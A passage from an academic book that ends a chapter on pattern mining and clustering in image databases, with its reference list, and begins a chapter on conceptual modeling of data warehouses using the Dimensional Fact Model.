Multistrategical classification and interpretation: The authors extend their multistrategy classification methods in order to be able to deal with data from different sources, and to take into account the multiformalism paradigm to which the different strategies can contribute some different but complementary skills. Considering a unified representation, it will be possible to perform a multistage learning corresponding to different abstraction levels. Moreover, this extension will result in classification of heterogeneous objects and semisupervised feature selection based on a coevolution of extractors. The results will make the understanding and the use of remote sensing information for general end users easier. User knowledge has to be integrated for operational guidance. It is worthwhile to use given expert knowledge to simplify extraction and classification procedures.
These three distinct phases respectively make it possible to make extractions from the geographical objects initiated from several images, to characterise them by a whole set of descriptors, to treat them using techniques of classification according to multiple strategies, and to identify them while being based on ontology. The process functions in an iterative way, until a satisfactory identification of the objects has been reached. If such objects are neither in ontology, nor in the database, they will be enriched. The proposed process is under development. The first stage is the most advanced in its development. Architecture has been developed to store the mass of data image as well as the geographical objects which will be built progressively. It is based on PostgreSQL and the associated API PostGIS to manage spatial data. A conceptual diagram of data, which reflects the structure of geographical objects, as well as the bonds which connect them, was defined as a preliminary. This made it possible to implement the database of
geographical objects. These geographical objects thus stored will be useful both as a reference and for the process of identification. In addition, the ontology of the geographical domain was defined to represent knowledge useful for the identification of the objects. This knowledge was acquired in two different ways: (1) by methods of elicitation, in collaboration with geography photo interpreters, to extract and formalise the discriminating attributes and (2) by supervised machine learning (Sheeren, Quirin, Puissant, & Gançarski, 2006). The ontology was developed in OWL under Protégé 2000. The mechanism making it possible to associate the objects stored in the base with the concepts of ontology is currently being studied. The principle is to extract an object from an image (by using a classifier) and to perform a matching between this object and the concepts of the ontology. According to the degree of similarity of the attributes with the properties of the concepts of ontology, the object will be labeled by the best-matching concept.
CONCLUSION Detection and recognition of semantic concepts from image databases is a major research challenge. A promising way could be the unsupervised mining of patterns. Patterns are recurrent, predictable occurrences of one or more entities that satisfy statistical, associative, or relational conditions. Together with the statistical aspect, we have presented some research related to the clustering methods applied to knowledge discovery from images in order to summarise image databases. But, we did not find many uses of the pattern mining method when employed to discover associative rules among images or between
pixels from one or several images. This raises two questions. The first is trying to discover such relations from images relevant. Second, if the answer is yes, how can we make this research
79
Pattern Mining and Clustering on Image Databases
effective? Nevertheless, we believe that such an approach can be very useful to highlight relations at the feature level (high level) as well. Patterns at the feature level may represent the occurrence of primitive concepts such as pixel clusters or relations between pixels. At the higher level, patterns may outline relations between semantic concepts and extracted clusters, or relations between semantic concepts themselves. Even if the clustering approach seems more mature than the approach related to the association rules discovery, we are still faced with many challenges in both domains. The most important in our opinion is to find adequate representations of data: experiments which show that using an image or a pixel directly as a transaction or as an item in a transaction is not efficient. More specific questions have to be answered, for example: How do we detect patterns starting from images with heterogeneous representation? How do we deal with patterns that may have relatively sparse occurring frequencies? How do we take into account temporality? And, last but not the least, how do we evaluate the quality of mining results given its unsupervised nature?
REFERENCES Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining association rules between sets of items in large databases. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1993), Washington, DC (pp. 207-216). ACM Press. Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules. In J. Bocca, M. Jarke, & C. Zoniolo (Eds.), Proceedings of the 20th International Conference on Very Large Data Bases (VLDB 1994), Santiago, Chile (pp. 487-499). Morgan Kaufmann.
80
Agrawal, R., & Srikant, R. (1995). Mining sequential patterns. In Proceedings of the 11th International Conference on Data Engineering (ICDE 1995), Taipei, Taiwan (pp. 3-14). IEEE Computer Society Press. Ardizzone, E., Daurel, T., Maniscalco, U., & Rigotti, C. (2001). Extraction of association rules between low-level descriptors and semantic descriptors in an image database. In Proceedings of the 1st International Workshop on Multimedia Data and Document Engineering (MDDE 2001), Lyon, France. Baeza-Yates, R. A. (1992). Introduction to data structure and algorithms related to information retrieval. In Information retrieval: Data structure and algorithms (pp. 13-27). Prentice Hall. Ball, G., & Hall, D. (1967). A clustering technique for summarizing multi-variate data. Behavioral Sciences, 12, 153-155. Baril, X., & Bellahsene, Z. (2000). A view model for XML documents. In D. Patel, I. Choudhury, S. Patel, & S. de Cesare (Eds.), International Conference on Object Oriented Information Systems, London, United Kingdom (pp. 429–441). Bayardo, R. J. (1998). Efficiently mining long patterns from databases. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1998), Seattle, Washington (pp. 85-93). ACM Press. Bayardo, R. J., Agrawal, R., & Gunopulos, D. (1999). Constraint-based rule mining in large, dense databases. In Proceedings of the 15th International Conference on Data Engineering (ICDE 1999). Sydney, Australia (pp. 188-197). IEEE Computer Society. Ben Messaoud, R., Boussaïd, O., & Loudcher Rabaseda, S. (2006). A data mining-based OLAP aggregation of complex data: Application on XML documents. International Journal of Data Warehousing and Mining, 2(4), 1-26.
Pattern Mining and Clustering on Image Databases
Berkhin, P. (2002). Survey of clustering data mining techniques. San Jose, CA: Accrue Software. Berners-Lee, T., Hendler, J., & Lassila, O. (2001). The Semantic Web. Scientific American, 284(5), 34-43.
Djeraba, C. (2003). Association and content-based retrieval. IEEE Transactions on Knowledge and Data Engineering, 15(1). Eakins, J. P. (2002). Towards intelligent image retrieval. Pattern Recognition, 35, 3-14.
Bouet, M., & Aufaure, M. A. (2006). New image retrieval principle: Image mining and visual ontology. In V. A. Petrushin & L. Khan (Eds.), Multimedia data mining and knowledge discovery. Springer.
Ester, M., Kriegel, H. P., Dansder, J., & Xu, X. (1996). A density-based algorithm for discovering clusters in large spatial databases with noise. In Proceedings of the Second ACM SIGKDD, Portland, Oregon (pp. 226-231).
Boussaid, O., Ben Messaoud, R., Choquet, R., & Anthoard, S. (2006a). XWarehousing: An XML-based approach for warehousing complex data. In Proceedings of the 10th East-European Conference on Advances in Databases and Information Systems (ADBIS06), Thessaloniki, Greece (pp. 39-54). Lecture Notes in Computer Science 4152.
Fogel, D. (1994). An introduction to simulated evolutionary optimization. IEEE Transactions on Neural Networks, 5(1), 3-14.
Boussaid, O., Tanasescu, A., Bentayeb, F., & Darmont, J. (2006b). Integrationand dimensional modelling approaches for complex data warehousing. Journal of Global Optimization, 37(4), 571-591. Brin, S., Motwani, R., & Silverstein, C. (1997). Beyond market baskets: Generalizing association rules to correlations. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1997), Tucson, Arizona (pp. 265-276). ACM Press. Chaudhuri, S., & Dayal, U. (1997). An overview of data warehousing and OLAP technology. SIGMOD Record, 26(1), 65-74. Cheung, D. W. L., Han, J., Ng, V., & Wong, C. Y. (1996). Maintenance of discovered association rules in large databases: An incremental updating technique. In Proceedings of the 12th International Conference on Data Engineering (ICDE 1996), New Orleans, Louisiana (pp. 106-114). IEEE Computer Society Press.
Fukuda, T., Morimoto¸ Y., Morishita, S., & Tokuyama, T. (1996). Data mining using twodimensional optimized association rules: Scheme, algorithms, and visualization. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1996), Montreal, Quebec, Canada (pp. 13-23). ACM Press. Gançarski, P., & Wemmert , C. (2005). Collaborative multi-strategy classification: Application to per-pixel analysis of images. In Proceedings of the Sixth International Workshop on Multimedia Data Mining (ACM SIGKDD), Chicago, Illinois. Goethals, B. (2005). Frequent set mining. In The data mining and knowledge discovery handbook (pp. 377-397). Springer. Gomez-Perez, A., & Rojas, M. D. (1999). Ontological reengineering and reuse. In D. Fensel & R. Studer (Eds.), Proceedings of the 11th European Workshop on Knowledge Acquisition, Modeling and Management (EKAW’99), Germany (pp. 139-156). Lecture Notes in Artificial Intelligence 1621. Springer-Verlag. Grosky, W. I., Sreenath, D. V., & Fotouhi, F. (2002). Emergent semantics and the multimedia semantic Web. SIGMOD Record, 4.
81
Pattern Mining and Clustering on Image Databases
Gruber, T. (1993). Toward principles for the design of ontologies used for knowledge sharing [Special issue]. International Journal of Human-Computer Studies. Guha, S., Rastogi, R., & Shim, K. (1998). CURE: An efficient clustering algorithm for large databases. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 73-84). Guha, S., Rastogi, R., & Shim, K. (2000). ROCK: A robust clustering algorithm for categorical attributes. Information Systems, 25(5), 345-366. Han, J., Dong, G., & Yin, Y. (1999). Efficient mining of partial periodic patterns in time series database. In Proceedings of the 15th International Conference on Data Engineering (ICDE 1999), Sydney, Australia (pp. 106-115). IEEE Computer Society. Han, J., & Fu, J. (1995). Discovery of mulƟplelevel associaƟon rules from large databases. In Proceedings of the 21st InternaƟonal Conference on Very Large Data Bases (VLDB 1995), Zurich, Switzerland (pp. 420-431). Morgan Kaufmann. Han, J., & Kamber, M. (2001). Data mining: Concepts and techniques (pp. 225-278, 395-449). San Francisco, CA: Morgan Kaufmann. Han, E. H., Karypis, G., & Kumar, V. (1997). Scalable parallel data mining for association rules. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1997), Tucson, Arizona (pp. 277-288). ACM Press. Hunter, J. (2001). Adding multimedia to the semantic Web: Building an MPEG-7 ontology. In Proceedings of the First International Semantic Web Working Symposium (SWWS’01), Stanford, California (pp. 261-283). Inmon, W. (2005). Building the data warehouse (4th ed.). John Wiley & Sons.
82
Jain, A. K., Murty, M. N., & Flynn, P. J. (1999). Data clustering: A review. ACM Computing Surveys, 31(3). Kamber, M., Han, J., & Chiang, J. (1997). Metarule-guided mining of multi-dimensional association rules using data cubes. In Proceedings of the 3rd International Conference on Knowledge Discovery and Data Mining (KDD 1997), Newport Beach, California (pp. 207-210). The AAAI Press. Karypis, G., Han, E., & Kumar, V. (1999). Chameleon: Hierarchical clustering using dynamic model. IEEE Computer, 32(8), 68-75. Kaufman, L., & Rousseew, P. (1990). Finding groups in data: An introduction to cluster analysis. New York: John Wiley & Sons. Kimball, R., & Ross, M. (2002). The data warehouse toolkit. John Wiley & Sons. Kleinberg, J. (2002). An impossibility theorem for clustering. Proceedings of the Conference on Advances in Neural Information Processing Systems, 15, 463-470. Klemettinen, M., Mannila, H., Ronkainen, P., Toivonen, H., & Verkamo, A. I. (1994). Finding interesting rules from large sets of discovered association rules. In Proceedings of the 3rd ACM International Conference on Information and Knowledge Management (CIKM 1994), Gaithersburg, Maryland (pp. 401-407). ACM Press. Kohonen, T. (1990). Self-organizing map. Proceeding of IEEE, 78(9), 1464-1480. Korn, F., Labrinidis, A., Kotidis, Y., & Faloutsos, C. (1998). Ratio rules: A new paradigm for fast, quantifiable data mining. In Proceedings of the 24th International Conference on Very Large Data Bases (VLDB 1998), New York, New York (pp. 582-593). Morgan Kaufmann. Lent, B., Swami, A. N., & Widom, J. (1997). Clustering association rules. In Proceedings of the 13th
Pattern Mining and Clustering on Image Databases
International Conference on Data Engineering (ICDE 1997), Birmingham, United Kingdom (pp. 220-231). IEEE Computer Society. MacQueen, J. (1967). Some methods for classification and analysis of multivariate observations. In L. M. Le Cam & J. Neyman (Eds.), Proceedings of the Fifth Berkeley Symposium on Mathematical Statistics and Probability (vol. 1, pp. 281-297). Berkeley: University of California Press. Maiz, N., Boussaïd, O., & Bentayeb, F. (2006). Ontology-based mediation system. In Proceedings of the 13th ISPE International Conference on Concurrent Engineering: Research and Applications (CE 2006), Antibes, France (pp. 181-189). Mannila, H., Toivonen, H., & Verkamo, A. I. (1994). Efficient algorithms for discovering association rules. In U. Fayyad & R. Uthurusamy (Eds.), Proceedings of the AAAI Workshop Knowledge Discovery in Databases (KDD’94) (pp. 181-192). AAAI Press. Meo, R., Psaila, G., & Ceri, S. (1996). A new SQL-like operator for mining association rules. In Proceedings of the 22nd International Conference on Very Large Data Bases (VLDB 1996), Bombay, India (pp. 122-133). Morgan Kaufmann. Miller, R. J., & Yang, Y. (1997). Association rules over interval data. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1997), Tucson, Arizona (pp. 452-461). ACM Press. Mitchell, T. (1998). Machine learning. New York: McGraw-Hill. Morin, A., Kouomou Chopo, A., & Chauchat, J. H. (2005). Dimension reduction and clustering for query-by-example in huge image databases. In Proceedings of the 3rd World Conference on Computational Statistics and Data Analysis, Chypre. Nagy, G. (1968). State of the art in pattern recognition. Proceedings of the IEEE, 56, 836-862.
Nassis, V., Rajagopalapillai, R., Dillon, T. S., & Rahayu, W. (2005). Conceptual and systematic design approach for XML document warehouses. International Journal of Data Warehousing and Mining, 1(3), 63-87. Idea Group Inc. Ng, R. T., Lakshmanan, L. V. S., Han, J., & Pang, A. (1998). Exploratory mining and pruning optimizations of constrained associations rules. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1998), Seattle, Washington (pp. 13-24). ACM Press. Noy, N. F., Fergerson, R. W., & Musen, M. A. (2000). The knowledge model of Protege-2000: Combining interoperability and flexibility. In Proceedings of the Second International Conference on Knowledge Engineering and Knowledge Management. Ordonez, C., & Omiecinski, E. (1999). Discovering association rules based on image content. In Proceedings of the IEEE Advances in Digital Libraries Conference (ADL’99), Baltimore, Maryland (pp. 38-49). Ozden, B., Ramaswamy, S., & Silberschatz, A. (1998). Cyclic association rules. In Proceedings of the 14th International Conference on Data Engineering (ICDE 1998), Orlando, Florida (pp. 412-421). IEEE Computer Society. Park, J. S., Chen, M. S., & Yu, P. S. (1995). An effective hash-based algorithm for mining association rules. In Proceedings of the 1995 ACM SIGMOD International Conference on Management of Data Volume, San Jose, California. SIGMOD Record, 24(2), 175-186. ACM Press. Park, J. S., Chen, M. S., & Yu, P. S. (1995a). Efficient parallel data mining for association rules. In Proceedings of the 4th International Conference on Information and Knowledge Management (CIKM 1995), Baltimore, Maryland (pp. 31-36). ACM Press.
83
Pattern Mining and Clustering on Image Databases
Pokorny, J. (2001). Modelling stars using XML. In DOLAP’01: Proceedings of the 4th ACM International Workshop on Data Warehousing and OLAP (pp. 24-31). Ramaswamy, S., Mahajan, S., & Silberschatz, A. (1998). On the discovery of interesting patterns in association rules. In Proceedings of the 24th International Conference on Very Large Data Bases (VLDB 1998), New York City, New York (pp. 368-379). Morgan Kaufmann. Rusu, L. I., Rahayu, J. W., & Taniar, D. (2005). A methodology for building XML data warehouses. International Journal of Data Warehousing and Mining, 1(2), 23-48. Idea Group Inc. Savasere, A., Omiecinski, E., & Navathe, S. B. (1995). An efficient algorithm for mining association rules in large databases. In Proceedings of the 21st InternaƟonal Conference on Very Large Data Bases (VLDB 1995), Zurich, Switzerland (pp. 432-444). Morgan Kaufmann. Sheeren, D., Quirin, A., Puissant, A., & Gançarski, P. (2006). Discovering rules with genetic algorithms to classify urban remotely sensed data. In Proceedings of the IEEE International Geoscience and Remote Sensing Symposium (IGARSS’06).
Srikant, R., & Agrawal¸ R. (1996). Mining quantitative association rules in large relational tables. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1996), Montreal, Quebec, Canada (pp. 1-12). ACM Press. Srikant, R., Vu, Q., & Agrawal, R. (1997). Mining association rules with item constraints. In Proceedings of the 3rd International Conference on Knowledge Discovery and Data Mining (KDD 1997), Newport Beach, California (pp. 67-73). The AAAI Press. Toivonen, H. (1996). Sampling large databases for association rules. In Proceedings of the 22nd International Conference on Very Large Data Bases (VLDB 1996), Bombay, India (pp. 134-145). Morgan Kaufmann. Tollari, S., Glotin, H., & Le Maitre, J. (2005). Enhancement of textual images classification using segmented visual contents for image search engine. Multimedia Tools and Applications, 25, 405-417). Troncy, R. (2003). Integration structure and semantics into audio-visual documents. In D. Fensel et al. (Eds.), Proceedings of ISWC2003 (pp. 566581). Lecture Notes in Computer Science 2870.
Silverstein, C., Brin, S., Motwani, R., & Ullman, J. (1998). Scalable techniques for mining causal structures. Data Mining Knowledge Discovery, 4(2-3), 163-192.
Wemmert, C. & Gançarski, P. (2002). A multiview voting method to combine unsupervised clarifications. In Proceedings of the IASTED Artificial Intelligence and Applications Conference.
Simoff, S. J., Djeraba, C., & Zaïane, O. R. (2002). MDM/KDD2002: Multimedia data mining between promises and problems. ACM SIGKDD Explorations, 4(2).
Wiederhold, G. (1995). Mediation in information systems. ACM Computing Surveys, 27(2), 265-267.
Srikant, R., & Agrawal, R. (1995). Mining generalized association rules. In Proceedings of the 21st International Conference on Very Large Data Bases (VLDB 1995), Zurich, Switzerland (pp. 407-419). Morgan Kaufmann.
84
Wong, S. T. C., Hoo, K. S., Knowlton, R. C., Laxer, K. D., Cao, X., Hawkins, R. A., Dillon, W. P., & Arenson, R. L. (2002). Design and applications of a multimodality image data warehouse framework. The Journal of the American Medical Informatics Association, 9(3), 239-254.
Pattern Mining and Clustering on Image Databases
Xu, R., & Wunsch, D. (2005). Survey of clustering algorithms. IEEE Transactions on Neural Networks, 16(13), 645-678. Zaïne, O. R., Han J., & Zhu, H. (2000). Mining recurrent items in multimedia with progressive resolution refinement. In Proceedings of the International Conference on Data Engineering (ICDE’00), San Diego, California. Zhang, J., Hsu, W., & Lee, M. L. (2001). Image mining: Issues, frameworks and techniques. In Proceedings of the Second International Workshop on Multimedia Data Mining (MDM/KDD), San Francisco, California.
Zhang, T., Ramakrishman, R., & Livny, M. (1996). BIRCH: An efficient data clustering algorithm for very large databases. In Proceedings of the International Conference on Management of Data (pp. 103-114).
ENDNOTES 1
2
In all the results, the colours have been randomly chosen by the authors. http://lsiit.u-strasbg.fr/afd/fodomust.
This work was previously published in Successes and New Directions in Data Mining, edited by F. Masseglia, P. Poncelet, and M. Teisseire, pp. 187-212, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
85
86
Chapter 1.6
Conceptual Modeling Solutions for the Data Warehouse Stefano Rizzi DEIS - University of Bologna, Italy
ABSTRACT
INTRODUCTION
In the context of data warehouse design, a basic role is played by conceptual modeling, that provides a higher level of abstraction in describing the warehousing process and architecture in all its aspects, aimed at achieving independence of implementation issues. This chapter focuses on a conceptual model called the DFM that suits the variety of modeling situations that may be encountered in real projects of small to large complexity. The aim of the chapter is to propose a comprehensive set of solutions for conceptual modeling according to the DFM and to give the designer a practical guide for applying them in the context of a design methodology. Besides the basic concepts of multidimensional modeling, the other issues discussed are descriptive and cross-dimension attributes; convergences; shared, incomplete, recursive, and dynamic hierarchies; multiple and optional arcs; and additivity.
Operational databases are focused on recording transactions, thus they are prevalently characterized by an OLTP (online transaction processing) workload. Conversely, data warehouses (DWs) allow complex analysis of data aimed at decision support; the workload they support has completely different characteristics, and is widely known as OLAP (online analytical processing). Traditionally, OLAP applications are based on multidimensional modeling that intuitively represents data under the metaphor of a cube whose cells correspond to events that occurred in the business domain (Figure 1). Each event is quantified by a set of measures; each edge of the cube corresponds to a relevant dimension for analysis, typically associated to a hierarchy of attributes that further describe it. The multidimensional model has a twofold benefit. On the one hand, it is close to the way of thinking of data analyz-
Conceptual Modeling Solutions for the Data Warehouse
Figure 1. The cube metaphor for multidimensional modeling
ers, who are used to the spreadsheet metaphor; therefore it helps users understand data. On the other hand, it supports performance improvement as its simple structure allows designers to predict the user intentions. Multidimensional modeling and OLAP workloads require specialized design techniques. In the context of design, a basic role is played by conceptual modeling that provides a higher level of abstraction in describing the warehousing process and architecture in all its aspects, aimed at achieving independence of implementation issues. Conceptual modeling is widely recognized to be the necessary foundation for building a database that is well-documented and fully satisfies the user requirements; usually, it relies on a graphical notation that facilitates writing, understanding, and managing conceptual schemata by both designers and users. Unfortunately, in the field of data warehousing there still is no consensus about a formalism for conceptual modeling (Sen & Sinha, 2005). The entity/relationship (E/R) model is widespread in the enterprises as a conceptual formalism to provide standard documentation for relational information systems, and a great deal of effort has been made to use E/R schemata as the input for designing nonrelational databases as well (Fahrner
& Vossen, 1995); nevertheless, as E/R is oriented to support queries that navigate associations between data rather than synthesize them, it is not well suited for data warehousing (Kimball, 1996). Actually, the E/R model has enough expressivity to represent most concepts necessary for modeling a DW; on the other hand, in its basic form, it is not able to properly emphasize the key aspects of the multidimensional model, so that its usage for DWs is expensive from the point of view of the graphical notation and not intuitive (Golfarelli, Maio, & Rizzi, 1998). Some designers claim to use star schemata for conceptual modeling. A star schema is the standard implementation of the multidimensional model on relational platforms; it is just a (denormalized) relational schema, so it merely defines a set of relations and integrity constraints. Using the star schema for conceptual modeling is like starting to build a complex software by writing the code, without the support of and static, functional, or dynamic model, which typically leads to very poor results from the points of view of adherence to user requirements, of maintenance, and of reuse. For all these reasons, in the last few years the research literature has proposed several original approaches for modeling a DW, some based on
87
Conceptual Modeling Solutions for the Data Warehouse
extensions of E/R, some on extensions of UML. This chapter focuses on an ad hoc conceptual model, the dimensional fact model (DFM), that was first proposed in Golfarelli et al. (1998) and continuously enriched and refined during the following years in order to optimally suit the variety of modeling situations that may be encountered in real projects of small to large complexity. The aim of the chapter is to propose a comprehensive set of solutions for conceptual modeling according to the DFM and to give a practical guide for applying them in the context of a design methodology. Besides the basic concepts of multidimensional modeling, namely facts, dimensions, measures, and hierarchies, the other issues discussed are descriptive and cross-dimension attributes; convergences; shared, incomplete, recursive, and dynamic hierarchies; multiple and optional arcs; and additivity. After reviewing the related literature in the next section, in the third and fourth sections, we introduce the constructs of DFM for basic and advanced modeling, respectively. Then, in the fifth section we briefly discuss the different methodological approaches to conceptual design. Finally, in the sixth section we outline the open issues in conceptual modeling, and in the last section we draw the conclusions.
RELATED LITERATURE In the context of data warehousing, the literature proposed several approaches to multidimensional
modeling. Some of them have no graphical support and are aimed at establishing a formal foundation for representing cubes and hierarchies as well as an algebra for querying them (Agrawal, Gupta, & Sarawagi, 1995; Cabibbo & Torlone, 1998; Datta & Thomas, 1997; Franconi & Kamble, 2004a; Gyssens & Lakshmanan, 1997; Li & Wang, 1996; Pedersen & Jensen, 1999; Vassiliadis, 1998); since we believe that a distinguishing feature of conceptual models is that of providing a graphical support to be easily understood by both designers and users when discussing and validating requirements, we will not discuss them. The approaches to “strict” conceptual modeling for DWs devised so far are summarized in Table 1. For each model, the table shows if it is associated to some method for conceptual design and if it is based on E/R, is object-oriented, or is an ad hoc model. The discussion about whether E/R-based, object-oriented, or ad hoc models are preferable is controversial. Some claim that E/R extensions should be adopted since (1) E/R has been tested for years; (2) designers are familiar with E/R; (3) E/R has proven flexible and powerful enough to adapt to a variety of application domains; and (4) several important research results were obtained for the E/R (Sapia, Blaschka, Hofling, & Dinter, 1998; Tryfona, Busborg, & Borch Christiansen, 1999). On the other hand, advocates of object-oriented models argue that (1) they are more expressive and better represent static and dynamic properties of information systems; (2) they provide powerful mechanisms for expressing requirements and
Table 1. Approaches to conceptual modeling
no method
method
88
E/R extension
object-oriented
ad hoc
Franconi and Kamble (2004b); Sapia et al. (1998); Tryfona et al. (1999)
Abelló et al. (2002); Nguyen, Tjoa, and Wagner (2000)
Tsois et al. (2001)
Luján-Mora et al. (2002)
Golfarelli et al. (1998); Hüsemann et al. (2000)
Conceptual Modeling Solutions for the Data Warehouse
constraints; (3) object-orientation is currently the dominant trend in data modeling; and (4) UML, in particular, is a standard and is naturally extensible (Abelló, Samos, & Saltor, 2002; LujánMora, Trujillo, & Song, 2002). Finally, we believe that ad hoc models compensate for the lack of familiarity from designers with the fact that (1) they achieve better notational economy; (2) they give proper emphasis to the peculiarities of the multidimensional model, thus (3) they are more intuitive and readable by nonexpert users. In particular, they can model some constraints related to functional dependencies (e.g., convergences and cross-dimensional attributes) in a simpler way than UML, that requires the use of formal expressions written, for instance, in OCL.
A comparison of the different models done by Tsois, Karayannidis, and Sellis (2001) pointed out that, abstracting from their graphical form, the core expressivity is similar. In confirmation of this, we show in Figure 2 how the same simple fact could be modeled through an E/R based, an object-oriented, and an ad hoc approach.
THE DIMENSIONAL FACT MODEL: BASIC MODELING In this chapter we focus on an ad hoc model called the dimensional fact model. The DFM is a graphical conceptual model, specifically devised for multidimensional modeling, aimed at:
Figure 2. The SALE fact modeled through a starER (Sapia et al., 1998), a UML class diagram (LujánMora et al., 2002), and a fact schema (Hüsemann, Lechtenbörger, & Vossen, 2000)
89
Conceptual Modeling Solutions for the Data Warehouse
• • •
• •
Effectively supporting conceptual design Providing an environment on which user queries can be intuitively expressed Supporting the dialogue between the designer and the end users to refine the specification of requirements Creating a stable platform to ground logical design Providing an expressive and non-ambiguous design documentation
The representation of reality built using the DFM consists of a set of fact schemata. The basic concepts modeled are facts, measures, dimensions, and hierarchies. In the following we intuitively define these concepts, referring the reader to Figure 3 that depicts a simple fact schema for modeling invoices at line granularity; a formal definition of the same concepts can be found in Golfarelli et al. (1998). Definition 1: A fact is a focus of interest for the decision-making process; typically, it models a set of events occurring in the enterprise world. A fact is graphically represented by a box with two sections, one for the fact name and one for the measures.
Examples of facts in the trade domain are sales, shipments, purchases, claims; in the financial domain: stock exchange transactions, contracts for insurance policies, granting of loans, bank statements, credit cards purchases. It is essential for a fact to have some dynamic aspects, that is, to evolve somehow across time. Guideline 1: The concepts represented in the data source by frequently-updated archives are good candidates for facts; those represented by almost-static archives are not. As a matter of fact, very few things are completely static; even the relationship between cities and regions might change, if some border were revised. Thus, the choice of facts should be based either on the average periodicity of changes, or on the specific interests of analysis. For instance, assigning a new sales manager to a sales department occurs less frequently than coupling a promotion to a product; thus, while the relationship between promotions and products is a good candidate to be modeled as a fact, that between sales managers and departments is not—except for the personnel manager, who is interested in analyzing the turnover!
Figure 3. A basic fact schema for the INVOICE LINE fact
90
Conceptual Modeling Solutions for the Data Warehouse
Definition 2: A measure is a numerical property of a fact, and describes one of its quantitative aspects of interests for analysis. Measures are included in the bottom section of the fact. For instance, each invoice line is measured by the number of units sold, the price per unit, the net amount, and so forth. The reason why measures should be numerical is that they are used for computations. A fact may also have no measures, if the only interesting thing to be recorded is the occurrence of events; in this case the fact scheme is said to be empty and is typically queried to count the events that occurred. Definition 3: A dimension is a fact property with a finite domain and describes one of its analysis coordinates. The set of dimensions of a fact determines its finest representation granularity. Graphically, dimensions are represented as circles attached to the fact by straight lines. Typical dimensions for the invoice fact are product, customer, agent, and date. Guideline 2: At least one of the dimensions of the fact should represent time, at any granularity. The relationship between measures and dimensions is expressed, at the instance level, by the concept of event. Definition 4: A primary event is an occurrence of a fact, and is identified by a tuple of values, one for each dimension. Each primary event is described by one value for each measure. Primary events are the elemental information which can be represented (in the cube metaphor, they correspond to the cube cells). In the invoice example they model the invoicing of one product to one customer made by one agent on one day; it is not possible to distinguish between invoices possibly made with different types (e.g., active,
passive, returned, etc.) or in different hours of the day. Guideline 3: If the granularity of primary events as determined by the set of dimensions is coarser than the granularity of tuples in the data source, measures should be defined as either aggregations of numerical attributes in the data source, or as counts of tuples. Remarkably, some multidimensional models in the literature focus on treating dimensions and measures symmetrically (Agrawal et al., 1995; Gyssens & Lakshmanan, 1997). This is an important achievement from both the point of view of the uniformity of the logical model and that of the flexibility of OLAP operators. Nevertheless we claim that, at a conceptual level, distinguishing between measures and dimensions is important since it allows logical design to be more specifically aimed at the efficiency required by data warehousing applications. Aggregation is the basic OLAP operation, since it allows significant information useful for decision support to be summarized from large amounts of data. From a conceptual point of view, aggregation is carried out on primary events thanks to the definition of dimension attributes and hierarchies. Definition 5: A dimension attribute is a property, with a finite domain, of a dimension. Like dimensions, it is represented by a circle. For instance, a product is described by its type, category, and brand; a customer, by its city and its nation. The relationships between dimension attributes are expressed by hierarchies. Definition 6: A hierarchy is a directed tree, rooted in a dimension, whose nodes are all the dimension attributes that describe that dimension, and whose arcs model many-to-one associations between pairs of dimension attributes. Arcs are graphically represented by straight lines. 91
Conceptual Modeling Solutions for the Data Warehouse
Guideline 4: Hierarchies should reproduce the pattern of interattribute functional dependencies expressed by the data source. Hierarchies determine how primary events can be aggregated into secondary events and selected significantly for the decision-making process. The dimension in which a hierarchy is rooted defines its finest aggregation granularity, while the other dimension attributes define progressively coarser granularities. For instance, thanks to the existence of a many-to-one association between products and their categories, the invoicing events may be grouped according to the category of the products. Definition 7: Given a set of dimension attributes, each tuple of their values identifies a secondary event that aggregates all the corresponding primary events. Each secondary event is described by a value for each measure that summarizes the values taken by the same measure in the corresponding primary events. We close this section by surveying some alternative terminology used either in the literature or in the commercial tools. There is
substantial agreement on using the term dimensions to designate the “entry points” to classify and identify events; while we refer in particular to the attribute determining the minimum fact granularity, sometimes the whole hierarchies are named as dimensions (for instance, the term “time dimension” often refers to the whole hierarchy built on dimension date). Measures are sometimes called variables or metrics. Finally, in some data warehousing tools, the term hierarchy denotes each single branch of the tree rooted in a dimension.
THE DIMENSIONAL FACT MODEL: ADVANCED MODELING The constructs we introduce in this section, with the support of Figure 4, are descriptive and cross-dimension attributes; convergences; shared, incomplete, recursive, and dynamic hierarchies; multiple and optional arcs; and additivity. Though some of them are not necessary in the simplest and most common modeling situations, they are quite useful in order to better express the multitude of conceptual shades that characterize real-world scenarios. In particular we will see how, follow-
Figure 4. The complete fact schema for the INVOICE LINE fact
92
Conceptual Modeling Solutions for the Data Warehouse
ing the introduction of some of this constructs, hierarchies will no longer be defined as trees to become, in the general case, directed graphs.
Convergence
In several cases it is useful to represent additional information about a dimension attribute, though it is not interesting to use such information for aggregation. For instance, the user may ask for knowing the address of each store, but the user will hardly be interested in aggregating sales according to the address of the store.
Consider the geographic hierarchy on dimension customer (Figure 4): customers live in cities, which are grouped into states belonging to nations. Suppose that customers are grouped into sales districts as well, and that no inclusion relationships exist between districts and cities/states; on the other hand, sales districts never cross the nation boundaries. In this case, each customer belongs to exactly one nation whichever of the two paths is followed (customer → city → state → nation or customer → sales district → nation).
Definition 8: A descriptive attribute specifies a property of a dimension attribute, to which is related by an x-to-one association. Descriptive attributes are not used for aggregation; they are always leaves of their hierarchy and are graphically represented by horizontal lines.
Definition 10: A convergence takes place when two dimension attributes within a hierarchy are connected by two or more alternative paths of many-to-one associations. Convergences are represented by letting two or more arcs converge on the same dimension attribute.
There are two main reasons why a descriptive attribute should not be used for aggregation: Guideline 5: A descriptive attribute either has a continuously-valued domain (for instance, the weight of a product), or is related to a dimension attribute by a one-to-one association (for instance, the address of a customer).
